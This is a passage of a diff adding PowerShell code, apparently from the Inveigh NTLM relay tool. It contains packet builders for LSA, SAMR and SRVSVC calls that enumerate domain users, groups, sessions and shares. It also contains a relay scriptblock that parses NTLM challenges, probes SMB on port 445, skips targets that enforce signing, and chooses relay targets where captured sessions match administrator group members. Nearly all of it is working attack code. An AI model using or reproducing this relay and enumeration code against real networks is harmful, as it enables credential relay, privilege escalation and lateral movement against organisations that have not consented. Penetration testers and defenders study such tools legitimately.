+ $LSAQueryInfoPolicy.Add("PointerToHandle",$Handle)
+ $LSAQueryInfoPolicy.Add("Level",[Byte[]](0x05,0x00))
+
+ return $LSAQueryInfoPolicy
+}
+
+function New-PacketLSAClose
+{
+ param([Byte[]]$Handle)
+
+ $LSAClose = New-Object System.Collections.Specialized.OrderedDictionary
+ $LSAClose.Add("PointerToHandle",$Handle)
+
+ return $LSAClose
+}
+
+function New-PacketLSALookupSids
+{
+ param([Byte[]]$Handle,[Byte[]]$SIDArray)
+
+ $LSALookupSids = New-Object System.Collections.Specialized.OrderedDictionary
+ $LSALookupSids.Add("PointerToHandle",$Handle)
+ $LSALookupSids.Add("PointerToSIDs_SIDArray",$SIDArray)
+ $LSALookupSids.Add("PointerToNames_count",[Byte[]](0x00,0x00,0x00,0x00))
+ $LSALookupSids.Add("PointerToNames_NULL_pointer",[Byte[]](0x00,0x00,0x00,0x00))
+ $LSALookupSids.Add("PointerToNames_level",[Byte[]](0x01,0x00))
+ $LSALookupSids.Add("PointerToCount",[Byte[]](0x00,0x00))
+ $LSALookupSids.Add("PointerToCount_count",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $LSALookupSids
+}
+
+# SAMR
+
+function New-PacketSAMRConnect2
+{
+ param([String]$SystemName)
+
+ [Byte[]]$system_name = [System.Text.Encoding]::Unicode.GetBytes($SystemName)
+ [Byte[]]$max_count = [System.BitConverter]::GetBytes($SystemName.Length + 1)
+
+ if($SystemName.Length % 2)
+ {
+ $system_name += 0x00,0x00
+ }
+ else
+ {
+ $system_name += 0x00,0x00,0x00,0x00
+ }
+
+ $SAMRConnect2 = New-Object System.Collections.Specialized.OrderedDictionary
+ $SAMRConnect2.Add("PointerToSystemName_ReferentID",[Byte[]](0x00,0x00,0x02,0x00))
+ $SAMRConnect2.Add("PointerToSystemName_MaxCount",$max_count)
+ $SAMRConnect2.Add("PointerToSystemName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $SAMRConnect2.Add("PointerToSystemName_ActualCount",$max_count)
+ $SAMRConnect2.Add("PointerToSystemName_SystemName",$system_name)
+ $SAMRConnect2.Add("AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
+
+ return $SAMRConnect2
+}
+
+function New-PacketSAMRConnect5
+{
+ param([String]$SystemName)
+
+ $SystemName = "\\" + $SystemName
+ [Byte[]]$system_name = [System.Text.Encoding]::Unicode.GetBytes($SystemName)
+ [Byte[]]$max_count = [System.BitConverter]::GetBytes($SystemName.Length + 1)
+
+ if($SystemName.Length % 2)
+ {
+ $system_name += 0x00,0x00
+ }
+ else
+ {
+ $system_name += 0x00,0x00,0x00,0x00
+ }
+
+ $SAMRConnect5 = New-Object System.Collections.Specialized.OrderedDictionary
+ $SAMRConnect5.Add("PointerToSystemName_ReferentID",[Byte[]](0x00,0x00,0x02,0x00))
+ $SAMRConnect5.Add("PointerToSystemName_MaxCount",$max_count)
+ $SAMRConnect5.Add("PointerToSystemName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $SAMRConnect5.Add("PointerToSystemName_ActualCount",$max_count)
+ $SAMRConnect5.Add("PointerToSystemName_SystemName",$system_name)
+ $SAMRConnect5.Add("AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
+ $SAMRConnect5.Add("LevelIn",[Byte[]](0x01,0x00,0x00,0x00))
+ $SAMRConnect5.Add("PointerToInfoIn_SAMRConnectInfo_InfoIn",[Byte[]](0x01,0x00,0x00,0x00))
+ $SAMRConnect5.Add("PointerToInfoIn_SAMRConnectInfo_InfoIn1_ClientVersion",[Byte[]](0x02,0x00,0x00,0x00))
+ $SAMRConnect5.Add("PointerToInfoIn_SAMRConnectInfo_InfoIn1_Unknown",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $SAMRConnect5
+}
+
+function New-PacketSAMRGetMembersInAlias
+{
+ param([Byte[]]$Handle)
+
+ $SAMRGetMembersInAlias = New-Object System.Collections.Specialized.OrderedDictionary
+ $SAMRGetMembersInAlias.Add("PointerToConnectHandle",$Handle)
+
+ return $SAMRGetMembersInAlias
+}
+
+function New-PacketSAMRClose
+{
+ param([Byte[]]$Handle)
+
+ $SAMRClose = New-Object System.Collections.Specialized.OrderedDictionary
+ $SAMRClose.Add("PointerToConnectHandle",$Handle)
+
+ return $SAMRClose
+}
+
+function New-PacketSAMROpenAlias
+{
+ param([Byte[]]$Handle,[Byte[]]$RID)
+
+ $SAMROpenAlias = New-Object System.Collections.Specialized.OrderedDictionary
+ $SAMROpenAlias.Add("PointerToConnectHandle",$Handle)
+ $SAMROpenAlias.Add("AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
+ $SAMROpenAlias.Add("RID",$RID)
+
+ return $SAMROpenAlias
+}
+
+function New-PacketSAMROpenGroup
+{
+ param([Byte[]]$Handle,[Byte[]]$RID)
+
+ $SAMROpenGroup = New-Object System.Collections.Specialized.OrderedDictionary
+ $SAMROpenGroup.Add("PointerToConnectHandle",$Handle)
+ $SAMROpenGroup.Add("AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
+ $SAMROpenGroup.Add("RID",$RID)
+
+ return $SAMROpenGroup
+}
+
+function New-PacketSAMRQueryGroupMember
+{
+ param([Byte[]]$Handle)
+
+ $SAMRQueryGroupMember = New-Object System.Collections.Specialized.OrderedDictionary
+ $SAMRQueryGroupMember.Add("PointerToGroupHandle",$Handle)
+
+ return $SAMRQueryGroupMember
+}
+
+function New-PacketSAMROpenDomain
+{
+ param([Byte[]]$Handle,[Byte[]]$SIDCount,[Byte[]]$SID)
+
+ $SAMROpenDomain = New-Object System.Collections.Specialized.OrderedDictionary
+ $SAMROpenDomain.Add("PointerToConnectHandle",$Handle)
+ $SAMROpenDomain.Add("AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
+ $SAMROpenDomain.Add("PointerToSid_Count",$SIDCount)
+ $SAMROpenDomain.Add("PointerToSid_Sid",$SID)
+
+ return $SAMROpenDomain
+}
+
+function New-PacketSAMREnumDomainUsers
+{
+ param([Byte[]]$Handle)
+
+ $SAMREnumDomainUsers = New-Object System.Collections.Specialized.OrderedDictionary
+ $SAMREnumDomainUsers.Add("PointerToDomainHandle",$Handle)
+ $SAMREnumDomainUsers.Add("PointerToResumeHandle",[Byte[]](0x00,0x00,0x00,0x00))
+ $SAMREnumDomainUsers.Add("AcctFlags",[Byte[]](0x10,0x00,0x00,0x00))
+ $SAMREnumDomainUsers.Add("MaxSize",[Byte[]](0xff,0xff,0x00,0x00))
+
+ return $SAMREnumDomainUsers
+}
+
+function New-PacketSAMRLookupNames
+{
+ param([Byte[]]$Handle,[String]$Names)
+
+ [Byte[]]$names_bytes = [System.Text.Encoding]::Unicode.GetBytes($Names)
+ [Byte[]]$name_len = ([System.BitConverter]::GetBytes($names_bytes.Length))[0,1]
+ [Byte[]]$max_count = [System.BitConverter]::GetBytes($Names.Length)
+
+ $SAMRLookupNames = New-Object System.Collections.Specialized.OrderedDictionary
+ $SAMRLookupNames.Add("PointerToDomainHandle",$Handle)
+ $SAMRLookupNames.Add("NumNames",[Byte[]](0x01,0x00,0x00,0x00))
+ $SAMRLookupNames.Add("PointerToNames_MaxCount",[Byte[]](0xe8,0x03,0x00,0x00))
+ $SAMRLookupNames.Add("PointerToNames_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $SAMRLookupNames.Add("PointerToNames_ActualCount",[Byte[]](0x01,0x00,0x00,0x00))
+ $SAMRLookupNames.Add("PointerToNames_Names_NameLen",$name_len)
+ $SAMRLookupNames.Add("PointerToNames_Names_NameSize",$name_len)
+ $SAMRLookupNames.Add("PointerToNames_Names_Name_ReferentID",[Byte[]](0x00,0x00,0x02,0x00))
+ $SAMRLookupNames.Add("PointerToNames_Names_Name_MaxCount",$max_count)
+ $SAMRLookupNames.Add("PointerToNames_Names_Name_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $SAMRLookupNames.Add("PointerToNames_Names_Name_ActualCount",$max_count)
+ $SAMRLookupNames.Add("PointerToNames_Names_Name_Names",$names_bytes)
+
+ return $SAMRLookupNames
+}
+
+function New-PacketSAMRLookupRids
+{
+ param([Byte[]]$Handle,[Byte[]]$RIDCount,[Byte[]]$Rids)
+
+ $SAMRLookupRIDS = New-Object System.Collections.Specialized.OrderedDictionary
+ $SAMRLookupRIDS.Add("PointerToDomainHandle",$Handle)
+ $SAMRLookupRIDS.Add("NumRids",$RIDCount)
+ $SAMRLookupRIDS.Add("Unknown",[Byte[]](0xe8,0x03,0x00,0x00,0x00,0x00,0x00,0x00))
+ $SAMRLookupRIDS.Add("NumRids2",$RIDCount)
+ $SAMRLookupRIDS.Add("Rids",$Rids)
+
+ return $SAMRLookupRIDS
+}
+
+# SRVSVC
+function New-PacketSRVSVCNetSessEnum
+{
+ param([String]$ServerUNC)
+
+ [Byte[]]$server_UNC = [System.Text.Encoding]::Unicode.GetBytes($ServerUNC)
+ [Byte[]]$max_count = [System.BitConverter]::GetBytes($ServerUNC.Length + 1)
+
+ if($ServerUNC.Length % 2)
+ {
+ $server_UNC += 0x00,0x00
+ }
+ else
+ {
+ $server_UNC += 0x00,0x00,0x00,0x00
+ }
+
+ $SRVSVCNetSessEnum = New-Object System.Collections.Specialized.OrderedDictionary
+ $SRVSVCNetSessEnum.Add("PointerToServerUNC_ReferentID",[Byte[]](0x00,0x00,0x02,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToServerUNC_MaxCount",$max_count)
+ $SRVSVCNetSessEnum.Add("PointerToServerUNC_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToServerUNC_ActualCount",$max_count)
+ $SRVSVCNetSessEnum.Add("PointerToServerUNC_ServerUNC",$server_UNC)
+ $SRVSVCNetSessEnum.Add("PointerToClient_ReferentID",[Byte[]](0x04,0x00,0x02,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToClient_MaxCount",[Byte[]](0x01,0x00,0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToClient_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToClient_ActualCount",[Byte[]](0x01,0x00,0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToClient_Client",[Byte[]](0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToUser",[Byte[]](0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToUser_ReferentID",[Byte[]](0x08,0x00,0x02,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToUser_MaxCount",[Byte[]](0x01,0x00,0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToUser_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToUser_ActualCount",[Byte[]](0x01,0x00,0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToUser_User",[Byte[]](0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToLevel",[Byte[]](0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToLevel_Level",[Byte[]](0x0a,0x00,0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToCtr_NetSessCtr_Ctr",[Byte[]](0x0a,0x00,0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToCtr_NetSessCtr_PointerToCtr10_ReferentID",[Byte[]](0x0c,0x00,0x02,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToCtr_NetSessCtr_PointerToCtr10_Ctr10_Count",[Byte[]](0x00,0x00,0x00,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToCtr_NetSessCtr_PointerToCtr10_Ctr10_NullPointer",[Byte[]](0x00,0x00,0x00,0x00))
+ $SRVSVCNetSessEnum.Add("MaxBuffer",[Byte[]](0xff,0xff,0xff,0xff))
+ $SRVSVCNetSessEnum.Add("PointerToResumeHandle_ReferentID",[Byte[]](0x10,0x00,0x02,0x00))
+ $SRVSVCNetSessEnum.Add("PointerToResumeHandle_ResumeHandle",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $SRVSVCNetSessEnum
+}
+
+function New-PacketSRVSVCNetShareEnumAll
+{
+ param([String]$ServerUNC)
+
+ $ServerUNC = "\\" + $ServerUNC
+ [Byte[]]$server_UNC = [System.Text.Encoding]::Unicode.GetBytes($ServerUNC)
+ [Byte[]]$max_count = [System.BitConverter]::GetBytes($ServerUNC.Length + 1)
+
+ if($ServerUNC.Length % 2)
+ {
+ $server_UNC += 0x00,0x00
+ }
+ else
+ {
+ $server_UNC += 0x00,0x00,0x00,0x00
+ }
+
+ $SRVSVCNetShareEnum = New-Object System.Collections.Specialized.OrderedDictionary
+ $SRVSVCNetShareEnum.Add("PointerToServerUNC_ReferentID",[Byte[]](0x00,0x00,0x02,0x00))
+ $SRVSVCNetShareEnum.Add("PointerToServerUNC_MaxCount",$max_count)
+ $SRVSVCNetShareEnum.Add("PointerToServerUNC_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $SRVSVCNetShareEnum.Add("PointerToServerUNC_ActualCount",$max_count)
+ $SRVSVCNetShareEnum.Add("PointerToServerUNC_ServerUNC",$server_UNC)
+ $SRVSVCNetShareEnum.Add("PointerToLevel_Level",[Byte[]](0x01,0x00,0x00,0x00))
+ $SRVSVCNetShareEnum.Add("PointerToCtr_NetShareCtr_Ctr",[Byte[]](0x01,0x00,0x00,0x00))
+ $SRVSVCNetShareEnum.Add("PointerToCtr_NetShareCtr_Pointer_ReferentID",[Byte[]](0x04,0x00,0x02,0x00))
+ $SRVSVCNetShareEnum.Add("PointerToCtr_NetShareCtr_Pointer_Ctr1_Count",[Byte[]](0x00,0x00,0x00,0x00))
+ $SRVSVCNetShareEnum.Add("PointerToCtr_NetShareCtr_Pointer_NullPointer",[Byte[]](0x00,0x00,0x00,0x00))
+ $SRVSVCNetShareEnum.Add("MaxBuffer",[Byte[]](0xff,0xff,0xff,0xff))
+ $SRVSVCNetShareEnum.Add("ReferentID",[Byte[]](0x08,0x00,0x02,0x00))
+ $SRVSVCNetShareEnum.Add("ResumeHandle",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $SRVSVCNetShareEnum
+}
+
+}
+
+# Relay Functions ScriptBlock
+$SMB_relay_functions_scriptblock =
+{
+
+ function Get-SMBNTLMChallenge
+ {
+ param ([Byte[]]$Payload)
+
+ $payload_converted = [System.BitConverter]::ToString($Payload)
+ $payload_converted = $payload_converted -replace "-",""
+ $NTLM_index = $payload_converted.IndexOf("4E544C4D53535000")
+
+ if($payload_converted.SubString(($NTLM_index + 16),8) -eq "02000000")
+ {
+ $NTLM_challenge = $payload_converted.SubString(($NTLM_index + 48),16)
+ }
+
+ $target_name_length = Get-UInt16DataLength (($NTLM_index + 24) / 2) $Payload
+ $negotiate_flags = [System.Convert]::ToInt16(($payload_converted.SubString(($NTLM_index + 44),2)),16)
+ $negotiate_flags = [Convert]::ToString($negotiate_flags,2)
+ $target_info_flag = $negotiate_flags.SubString(0,1)
+
+ if($target_info_flag -eq 1)
+ {
+ $target_info_index = ($NTLM_index + 80) / 2
+ $target_info_index = $target_info_index + $target_name_length + 16
+ $target_info_item_type = $Payload[$target_info_index]
+ $i = 0
+
+ while($target_info_item_type -ne 0 -and $i -lt 10)
+ {
+ $target_info_item_length = Get-UInt16DataLength ($target_info_index + 2) $Payload
+
+ switch($target_info_item_type)
+ {
+
+ 2
+ {
+ $netBIOS_domain_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $Payload
+ }
+
+ 3
+ {
+ $DNS_computer_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $Payload
+ }
+
+ 4
+ {
+ $DNS_domain_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $Payload
+ }
+
+ }
+
+ $target_info_index = $target_info_index + $target_info_item_length + 4
+ $target_info_item_type = $Payload[$target_info_index]
+ $i++
+ }
+
+ if($netBIOS_domain_name -and $DNS_domain_name -and !$inveigh.domain_mapping_table.$netBIOS_domain_name -and $netBIOS_domain_name -ne $DNS_domain_name)
+ {
+ $inveigh.domain_mapping_table.Add($netBIOS_domain_name,$DNS_domain_name)
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] Domain mapping added for $netBIOS_domain_name to $DNS_domain_name") > $null
+ }
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].IP -eq $target -and !$inveigh.enumerate[$i].Hostname)
+ {
+ $inveigh.enumerate[$i].Hostname = $DNS_computer_name
+ $inveigh.enumerate[$i]."DNS Domain" = $DNS_domain_name
+ $inveigh.enumerate[$i]."netBIOS Domain" = $netBIOS_domain_name
+ break
+ }
+
+ }
+
+ }
+
+ return $NTLM_challenge
+ }
+
+ function Invoke-SMBConnect
+ {
+ param ($ProcessID,$SourceIP)
+
+ function Test-SMBPort
+ {
+ param ($target)
+
+ $SMB_target_test = New-Object System.Net.Sockets.TCPClient
+ $SMB_target_test_result = $SMB_target_test.BeginConnect($target,"445",$null,$null)
+ $SMB_port_test_success = $SMB_target_test_result.AsyncWaitHandle.WaitOne(100,$false)
+ $SMB_target_test.Close()
+
+ if($SMB_port_test_success)
+ {
+ $SMB_server = $true
+ }
+ else
+ {
+ $SMB_server = $false
+ }
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].IP -eq $target)
+ {
+ $target_index = $i
+ break
+ }
+
+ }
+
+ if($target_index -and $inveigh.enumerate[$target_index].IP -eq $target)
+ {
+ $inveigh.enumerate[$target_index]."SMB Server" = $SMB_server
+ $inveigh.enumerate[$target_index]."Targeted" = $(Get-Date -format s)
+ }
+ else
+ {
+ $inveigh.enumerate.Add((New-RelayEnumObject -IP $target -SMBServer $SMB_server -Targeted $(Get-Date -format s))) > $null
+ }
+
+ return $SMB_port_test_success
+ }
+
+ function Invoke-SMBNegotiate
+ {
+ param ($Target)
+
+ $client = New-Object System.Net.Sockets.TCPClient
+ $client.Client.ReceiveTimeout = 60000
+ $client.Connect($target,"445")
+
+ try
+ {
+ $client_stream = $client.GetStream()
+ $stage = 'NegotiateSMB'
+ $client_receive = New-Object System.Byte[] 1024
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim()) stage $stage") > $null
+ $stage = 'Exit'
+ }
+
+ while($stage -ne 'Exit')
+ {
+
+ try
+ {
+
+ switch ($stage)
+ {
+
+ 'NegotiateSMB'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $ProcessID 0x00,0x00
+ $packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $client_stream.Write($client_send,0,$client_send.Length) > $null
+ $client_stream.Flush()
+ $client_stream.Read($client_receive,0,$client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($client_receive[4..7]) -eq 'ff-53-4d-42')
+ {
+ $SMB2 = $false
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Negotiated SMB1 not supported") > $null
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Trying anonther target") > $null
+ $client.Close()
+ $stage = 'Exit'
+ }
+ else
+ {
+ $SMB2 = $true
+ $stage = 'NegotiateSMB2'
+ }
+
+ if($target -and [System.BitConverter]::ToString($client_receive[70]) -eq '03')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Signing is required on $target") > $null
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Trying another target") > $null
+ $signing = $true
+ $client.Close()
+ $stage = 'Exit'
+ }
+ else
+ {
+ $signing = $false
+ }
+
+ }
+
+ 'NegotiateSMB2'
+ {
+ $tree_ID = 0x00,0x00,0x00,0x00
+ $session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $message_ID = 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $false $message_ID $ProcessID $tree_ID $session_ID
+ $packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $client_stream.Write($client_send,0,$client_send.Length) > $null
+ $client_stream.Flush()
+ $client_stream.Read($client_receive,0,$client_receive.Length) > $null
+ $stage = 'Exit'
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Grabbing challenge for relay from $target") > $null
+ }
+
+ }
+
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim()) stage $stage") > $null
+ $stage = 'Exit'
+ }
+
+ }
+
+ return $client,$SMB2,$signing
+ }
+
+ function Test-SMBTarget
+ {
+ param([Array]$targets,[Int]$limit,[String]$initiator)
+
+ $filter_date = Get-Date
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if(!$inveigh.enumerate[$i].IP -or $inveigh.enumerate[$i].IP -eq $SourceIP -or $inveigh.enumerate[$i].Signing -or $inveigh.enumerate[$i]."SMB2.1" -eq $false -or
+ ($inveigh.enumerate[$i]."SMB Server" -eq $false -and (New-TimeSpan $inveigh.enumerate[$i].Targeted $filter_date).Minutes -lt $TargetRefresh))
+ {
+
+ if($inveigh.enumerate[$i].IP)
+ {
+ $targets_excluded += @($inveigh.enumerate[$i].IP)
+ }
+
+ }
+
+ }
+
+ if($targets -and $targets_excluded)
+ {
+ $targets = Compare-Object -ReferenceObject $targets -DifferenceObject $targets_excluded -PassThru | Where-Object {$_.SideIndicator -eq "<="}
+ $sessions_temp = $inveigh.session
+
+ if($targets -and $inveigh.relay_history_table.$SourceIP -and
+ (Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP | Where-Object {$_.SideIndicator -eq "<="}))
+ {
+ [Array]$targets = Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP -PassThru | Where-Object {$_.SideIndicator -eq "<="}
+ }
+ elseif($targets -and ($sessions_temp | Where-Object {$_.Status}))
+ {
+ $targets_temp = $targets
+ $targets = @()
+
+ foreach($target_entry in $targets_temp)
+ {
+
+ $sessions = @($sessions_temp | Where-Object {$_.Target -eq $target_entry -and $_.Status -eq 'connected'})
+
+ if($sessions -and $sessions.Count -lt $limit)
+ {
+ $targets += $target_entry
+ }
+ elseif($initiator)
+ {
+ $sessions = @($sessions_temp | Where-Object {$_.Target -eq $target_entry -and $_.Initiator -eq $initiator -and $_.Status -eq 'connected'})
+
+ if($sessions -and $sessions.Count -lt $limit)
+ {
+ $targets += $target_entry
+ }
+
+ }
+
+ }
+
+ if(!$targets)
+ {
+
+ foreach($target_entry in $targets_temp)
+ {
+ $sessions = @($sessions_temp | Where-Object {$_.Target -eq $target_entry -and $_.Status -eq 'disconnected'})
+
+ if($sessions)
+ {
+ $targets += $target_entry
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+
+ if($targets -and $inveigh.target_list)
+ {
+ $targets = Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.target_list -ExcludeDifferent -IncludeEqual -PassThru
+ }
+
+ $i = 0
+ $random_index_history = @()
+
+ while(!$target -and $i -lt $targets.Count)
+ {
+ $i++
+
+ if($targets.Count -eq 1)
+ {
+ $target = $targets[0]
+ }
+ else
+ {
+ $random_range = 0..($targets.Count - 1)
+ $random_range_filtered = $random_range | Where-Object {$random_index_history -notcontains $_}
+
+ if($random_range_filtered)
+ {
+ $random_index = Get-Random -InputObject $random_range_filtered
+ $random_index_history += $random_index
+ $target = $targets[$random_index]
+ }
+
+ }
+
+ if($target -eq $SourceIP)
+ {
+ $target = $null
+ }
+
+ if($target)
+ {
+ $SMB_port_test_success = Test-SMBPort $target
+
+ if($SMB_port_test_success)
+ {
+ $SMB_negotiate = Invoke-SMBNegotiate $target
+ $client = $SMB_negotiate[0]
+ $SMB2 = $SMB_negotiate[1]
+ $signing = $SMB_negotiate[2]
+ $SMB_server = $true
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].IP -eq $target)
+ {
+ $target_index = $i
+ break
+ }
+
+ }
+
+ $inveigh.enumerate[$target_index]."SMB2.1" = $SMB2
+ $inveigh.enumerate[$target_index].Signing = $signing
+ $inveigh.enumerate[$target_index]."SMB Server" = $SMB_server
+ $inveigh.enumerate[$target_index]."Targeted" = $(Get-Date -format s)
+
+ if(!$SMB2 -and $signing)
+ {
+ $target = $null
+ }
+
+ }
+ else
+ {
+ $target = $null
+ }
+
+ }
+
+ }
+
+ return $client,$target
+ }
+
+ if($inveigh.target_list.Count -gt 1 -or (!$inveigh.target_list -and $inveigh.enumerate))
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Searching for a target") > $null
+ }
+
+ try
+ {
+ $targets = $null
+ $target = $null
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].IP -eq $SourceIP -and $inveigh.enumerate[$i].Sessions)
+ {
+ [Array]$initiator_sessions = $inveigh.enumerate[$i].Sessions
+ break
+ }
+
+ }
+
+ $initiator_sessions = $initiator_sessions | Sort-Object {Get-Random}
+
+ # check if sessions match any local admin group members
+ if($initiator_sessions)
+ {
+
+ foreach($session in $initiator_sessions)
+ {
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i]."Administrator Users" -contains $session -and $inveigh.enumerate[$i].IP)
+ {
+ $targets += @($inveigh.enumerate[$i].IP)
+ }
+
+ }
+
+ if($targets)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Administrator group match found for session $session on:") > $null
+ $inveigh.output_queue.Add(($targets -join ",")) > $null
+ $SMB_target_results = Test-SMBTarget $targets $SessionLimitPriv
+ $client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
+
+ }
+
+ }
+
+ # check if sessions belong to groups that match any local admin group members
+ if($initiator_sessions -and !$targets -and !$target)
+ {
+
+ function Get-SessionGroup
+ {
+ param($session)
+
+ $group_list = @()
+ $group_table_keys_temp = $inveigh.group_table.keys
+
+ foreach($group in $group_table_keys_temp)
+ {
+
+ if($inveigh.group_table.$group -contains $session)
+ {
+ $group_list += $group
+ }
+
+ }
+
+ for($i=0;$i -lt $group_list.Count;$i++)
+ {
+
+ foreach($group in $group_table_keys_temp)
+ {
+
+ if($inveigh.group_table.$group -contains $group_list[$i])
+ {
+ $group_list += $group
+ }
+
+ }
+
+ }
+
+ return $group_list
+ }
+
+ $session_groups = @()
+ $targets = @()
+
+ foreach($session in $initiator_sessions)
+ {
+ $session_groups += Get-SessionGroup $session
+ }
+
+ if($session_groups)
+ {
+
+ foreach($group in $session_groups)
+ {
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i]."Administrator Groups" -contains $group -and $inveigh.enumerate[$i].IP)
+ {
+ $targets += @($inveigh.enumerate[$i].IP)
+ }
+
+ }
+
+ if($targets)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Administrator group nested match found for $group from session $session on:") > $null
+ $inveigh.output_queue.Add(($targets -join ",")) > $null
+ $SMB_target_results = Test-SMBTarget $targets $SessionLimitPriv
+ $client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
+
+ }
+
+ }
+
+ }
+
+ # check if source IP matches any netsessions
+ if(!$targets -and !$target -and $SourceIP)
+ {
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].NetSession -contains $SourceIP)
+ {
+ $targets += @($inveigh.enumerate[$i].IP)
+ }
+
+ }
+
+ if($targets)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] NetSession IP match found for $SourceIP on:") > $null
+ $inveigh.output_queue.Add(($targets -join ",")) > $null
+ $SMB_target_results = Test-SMBTarget $targets $SessionLimitUnpriv
+ $client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
+
+ }
+
+ # get list of systems with custom shares
+ if(!$targets -and !$target)
+ {
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].Shares)
+ {
+ $targets += @($inveigh.enumerate[$i].IP)
+ }
+
+ }
+
+ if($targets)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Searching within the following list of systems hosting custom shares:") > $null
+ $inveigh.output_queue.Add(($targets -join ",")) > $null
+ $SMB_target_results = Test-SMBTarget $targets $SessionLimitShare $SourceIP
+ $client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
+
+ }
+
+ # get random target
+ if(!$target -and $TargetMode -eq 'Random')
+ {
